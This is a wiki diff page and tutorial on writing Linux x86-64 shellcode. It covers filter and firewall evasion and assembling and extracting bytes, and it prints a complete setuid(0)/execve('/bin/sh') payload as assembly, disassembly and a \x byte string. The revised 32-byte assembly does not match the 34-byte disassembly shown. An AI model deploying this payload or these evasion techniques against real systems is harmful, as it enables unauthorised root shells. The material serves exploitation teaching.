Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Category:Shellcode"

From NetSec
Jump to: navigation, search
(Introduction)
Line 26: Line 26:
 
While traditional [[binary]] shellcodes will normally work unincumbered for [[unsanitized]], [[unpatched]], or larger [[input]]s, many target environments and applications may have a variety of limiting factors that serve as obstacles to traditional [[machine code]].  Most [[application]]s written in [[C]] or [[C++]] will require that the [[machine code]] be null-free, which is why [[null-free shellcode]] is the traditional basic form of executable shellcode [[programming]].
 
While traditional [[binary]] shellcodes will normally work unincumbered for [[unsanitized]], [[unpatched]], or larger [[input]]s, many target environments and applications may have a variety of limiting factors that serve as obstacles to traditional [[machine code]].  Most [[application]]s written in [[C]] or [[C++]] will require that the [[machine code]] be null-free, which is why [[null-free shellcode]] is the traditional basic form of executable shellcode [[programming]].
  
* Character filters can be evaded by utilizing [[polymorphic]] ([[#Self-modifying code|self-modifying code]]) to reconstruct bytecode outside of the allowed character set during runtime.  Most character filters restrict characters to the printable keyspace, and so [[ascii shellcode]] and [[alphanumeric shellcode]] have become prevalent means of circumventing them.
+
* Character filters can be evaded by utilizing [[polymorphic]] (self-modifying code) to reconstruct bytecode outside of the allowed character set during runtime.  Most character filters restrict characters to the printable keyspace, and so [[ascii shellcode]] and [[alphanumeric shellcode]] have become prevalent means of circumventing them.
  
 
* Character encoding can be bypassed by encoding the payload so that it will decode to the proper [[hexadecimal]] [[machine code]].  It is often that code will have to survive unicode, base64, case conversions, or other decoding before being copied into the vulnerable [[buffer]].
 
* Character encoding can be bypassed by encoding the payload so that it will decode to the proper [[hexadecimal]] [[machine code]].  It is often that code will have to survive unicode, base64, case conversions, or other decoding before being copied into the vulnerable [[buffer]].
Line 32: Line 32:
 
* [[Buffer]] size may be incredibly limited and can require ''second-order-injection'' in circumstances which the payload is too large to fit into the [[vulnerability|vulnerable]] [[buffer]].  As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.
 
* [[Buffer]] size may be incredibly limited and can require ''second-order-injection'' in circumstances which the payload is too large to fit into the [[vulnerability|vulnerable]] [[buffer]].  As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.
  
* [[Firewall]]s can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic.  [[#Bypassing firewalls|Bypassing firewalls]] has been accomplished by utilizing ''file-descriptor re-use''.
+
* [[Firewall]]s can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic.  Bypassing firewalls has been accomplished by utilizing ''file-descriptor re-use''.
  
 
* Analysts may be [[debugging]] the vulnerable [[application]] in attempt to reverse engineer the [[exploitation]] process, [[int3 breakpoint detection]] and one-way hashing are demonstrated to evade volatile forensic analysis tools (such as volatility) .
 
* Analysts may be [[debugging]] the vulnerable [[application]] in attempt to reverse engineer the [[exploitation]] process, [[int3 breakpoint detection]] and one-way hashing are demonstrated to evade volatile forensic analysis tools (such as volatility) .
  
* Signatures usually get in the way with [[Linux]] shellcode particularly due to the fact that syscalls are traditionally used to interface with the [[C]] calling convention, thus the most static part of any given shellcode with a [[C]] interface.  Even [[polymorphic]] codes usually unpack into shellcodes containing syscalls.  Syscalls can be removed using [[#Runtime_linking_.28syscall_removal.29|self-linking code]].
+
* Signatures usually get in the way with [[Linux]] shellcode particularly due to the fact that syscalls are traditionally used to interface with the [[C]] calling convention, thus the most static part of any given shellcode with a [[C]] interface.  Even [[polymorphic]] codes usually unpack into shellcodes containing syscalls.  Syscalls can be removed using self-linking code.
  
 
== Shellcode mechanics ==
 
== Shellcode mechanics ==
Line 45: Line 45:
 
:* Many [[application]]s and [[SIM|security infrastructure]] components will partially [[Sanitize|filter inputs]], restricting the possible instruction set.  Sometimes this will even interfere when overwriting the [[return address]] during exploitation.  
 
:* Many [[application]]s and [[SIM|security infrastructure]] components will partially [[Sanitize|filter inputs]], restricting the possible instruction set.  Sometimes this will even interfere when overwriting the [[return address]] during exploitation.  
  
:* [[Operating system]]s handle the [[C]] [[API]] a bit differently.  Normally ([[Shellcode/Dynamic|but not always]]) shellcode for [[Linux]] relies on kernel interrupts for unlinked calls, while Microsoft Windows does not provide an interrupt API and shellcode must therefore utilize PE parsing to perform its own linking at runtime.
+
:* [[Operating system]]s handle the [[C]] [[API]] a bit differently.  Normally (but not always) shellcode for [[Linux]] relies on kernel interrupts for unlinked calls, while Microsoft Windows does not provide an interrupt API and shellcode must therefore utilize PE parsing to perform its own linking at runtime.
  
 
=== Assembling the code ===
 
=== Assembling the code ===
Line 51: Line 51:
 
Create a text file named '''test_shellcode.s'''.   
 
Create a text file named '''test_shellcode.s'''.   
  
This example will use [[User:Hatter|hatter]]'s null-free 34-byte payload for '''setuid(0); execve('/bin/sh',null,null)'''.  Copy the following code into '''test_shellcode.s''', then save it:
+
This example will use [[User:Hatter|hatter]]'s null-free 32-byte payload for '''setuid(0); execve('/bin/sh',null,null)'''.  Copy the following code into '''test_shellcode.s''', then save it:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 +
# 32 bytes
 
.text
 
.text
 
.globl _start
 
.globl _start
 
_start:
 
_start:
   xor %rdi, %rdi                 # Zero out %rdi (first argument)
+
   xor   %rdi,%rdi
   push $0x69
+
   pushq  $0x69
   pop %rax                       # Set %rax to function number for setuid()
+
   pop   %rax
   syscall                       # setuid(0);
+
   syscall
 
+
 
+
   push   %rdi
   push %rdi                    
+
   push   %rdi
   push %rdi
+
   pop   %rsi
   pop %rsi                    
+
   pop   %rdx
   pop %rdx                       # Null out %rdx and %rdx (second and third argument)
+
   pushq  $0x68
   mov $0x68732f6e69622f6a,%rdi  # move 'hs/nib/j' into %rdi
+
   movabs $0x7361622f6e69622f,%rax
   shr $0x8,%rdi                  # null truncate the backwards value to '\0hs/nib/'
+
   push   %rax
   push %rdi     
+
   push   %rsp
   push %rsp  
+
   pop   %rdi
   pop %rdi                       # %rdi is now a pointer to '/bin/sh\0'
+
   pushq  $0x3b
   push $0x3b                    
+
   pop   %rax
   pop %rax                       # set %rax to function # for execve()
+
   syscall
   syscall                       # execve('/bin/sh',null,null);
+
 
</source>}}
 
</source>}}
  

Revision as of 03:56, 1 December 2012

Shellcode, also known as bytecode, is machine code (binary represented in hexadecimal) which can be used for buffer overflow exploitation, and is usually represented to humans in assembly. Machine code can be used by a programmer to write any application from an assembly approach (as it is just as powerful as any other programming language), though unlike other languages it is usually (but not always) limited to a single operating system and instruction set architecture.

Shellcode requires a basic understanding of bitwise math, linux assembly, and stack overflows


Introduction

Every programming language is eventually expressed in binary, either at compile-time or runtime. When writing a buffer overflow there are many potential obstructions from security infrastructures (such as DEP, ASLR, firewalls, or IDS and IPS appliances) to keep in mind, as many filter bypass and IDS evasion techniques may need to be utilized for successful exploitation past modern countermeasures.

This article assumes that the user has access to some form of Linux or Unix bash environment with the standard GNU core utilities installed. In some cases, stub examples can be tested or used using OllyDBG or IDA pro. Throughout the articles in this category are small snippets of code taken from the examples found in the appendix; alternatively, shellcode and associated object files in this article are also contained in shellcodecs.

Types of shellcode

Many different types of shellcode may be utilized depending on the target environment for the execution of the code. Different types of countermeasures at different levels of the OSI model require different techniques for successful exploitation of a given application's vulnerability.

Executable vs. Return-oriented

There are primarily two types of shellcode from a runtime perspective: executable shellcode and return-oriented shellcode. The type required for successful exploitation is dictated by the target environment's ability to execute a data stack. If properly targetted, return oriented shellcode should work regardless of the stack's ability to execute, while executable shellcode will work exclusively on executable stacks.



  • Return oriented shellcode utilizes return oriented programming in cases when the vulnerable buffer is non-executable. This is usually performed by constructing a call stack formatted in a similar fashion to that generated by an ordinary compiled application which then triggers the execution of executable shellcode. Because the call stack is treated as data, this bypasses the need for an executable stack during exploitation.


c3el4.png Certain instruction set architectures, such as MIPS, are not vulnerable to return oriented programming or traditional stack overflows due to the fact that they do not store the return addresses to functions in the stack.

Countermeasures and environmental hostility

While traditional binary shellcodes will normally work unincumbered for unsanitized, unpatched, or larger inputs, many target environments and applications may have a variety of limiting factors that serve as obstacles to traditional machine code. Most applications written in C or C++ will require that the machine code be null-free, which is why null-free shellcode is the traditional basic form of executable shellcode programming.

  • Character filters can be evaded by utilizing polymorphic (self-modifying code) to reconstruct bytecode outside of the allowed character set during runtime. Most character filters restrict characters to the printable keyspace, and so ascii shellcode and alphanumeric shellcode have become prevalent means of circumventing them.
  • Character encoding can be bypassed by encoding the payload so that it will decode to the proper hexadecimal machine code. It is often that code will have to survive unicode, base64, case conversions, or other decoding before being copied into the vulnerable buffer.
  • Buffer size may be incredibly limited and can require second-order-injection in circumstances which the payload is too large to fit into the vulnerable buffer. As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.
  • Firewalls can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic. Bypassing firewalls has been accomplished by utilizing file-descriptor re-use.
  • Signatures usually get in the way with Linux shellcode particularly due to the fact that syscalls are traditionally used to interface with the C calling convention, thus the most static part of any given shellcode with a C interface. Even polymorphic codes usually unpack into shellcodes containing syscalls. Syscalls can be removed using self-linking code.

Shellcode mechanics

Shellcode is usually written first in assembly language. While it is possible for one to memorize an opcode table and write direct machine code by hand, this is not usually suitable for beginners and therefore is not recommended.

Environmental factors

  • Operating systems handle the C API a bit differently. Normally (but not always) shellcode for Linux relies on kernel interrupts for unlinked calls, while Microsoft Windows does not provide an interrupt API and shellcode must therefore utilize PE parsing to perform its own linking at runtime.

Assembling the code

Create a text file named test_shellcode.s.

This example will use hatter's null-free 32-byte payload for setuid(0); execve('/bin/sh',null,null). Copy the following code into test_shellcode.s, then save it:

 
# 32 bytes
.text
.globl _start
_start:
  xor    %rdi,%rdi
  pushq  $0x69
  pop    %rax
  syscall
 
  push   %rdi
  push   %rdi
  pop    %rsi
  pop    %rdx
  pushq  $0x68
  movabs $0x7361622f6e69622f,%rax
  push   %rax
  push   %rsp
  pop    %rdi
  pushq  $0x3b
  pop    %rax
  syscall
 

When creating shellcode on a Linux platform, the source file can be assembled using the GNU assembler:

Terminal

localhost:~ $ as test_shellcode.s -o test_shellcode.o

Extracting the shellcode

Once the shellcode has been assembled, it is possible to turn this into bytecode using the Linux binary object dumper:

Terminal

localhost:~ $ objdump -d test_shellcode.o

The middle column contains the byte instructions corresponding to the assembly on that line. Most debuggers also show a hexadecimal representation corresponding with the assembly of the debugged application, in this case:

user@host:~$ objdump -d test_shellcode.o

test_shellcode.o: file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
 
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
 

The hexadecimal in the middle column is the bytecode for the executable segment. To make this into "shellcode", place a \x prefix before each byte, like so:

\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05

If it is desirable, it can be turned directly into binary using perl's print statement, "echo -en" in bash, or other interpreted language.

Shellcode Disassembly

Many times you may come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does, the easiest way to do this is with objdump. In this example we'll use the example code which we just constructed, the shortest 64-bit setuid() shell online:

 ╭─user@host ~  
 ╰─➤  echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > 
 shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 shellcode:     file format binary
 Disassembly of section .data:
 00000000 <.data>:
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
 ╭─user@host ~  
 ╰─➤


Shellcode is part of a series on programming.
<center>
Shellcode is part of a series on exploitation.
<center>

</center>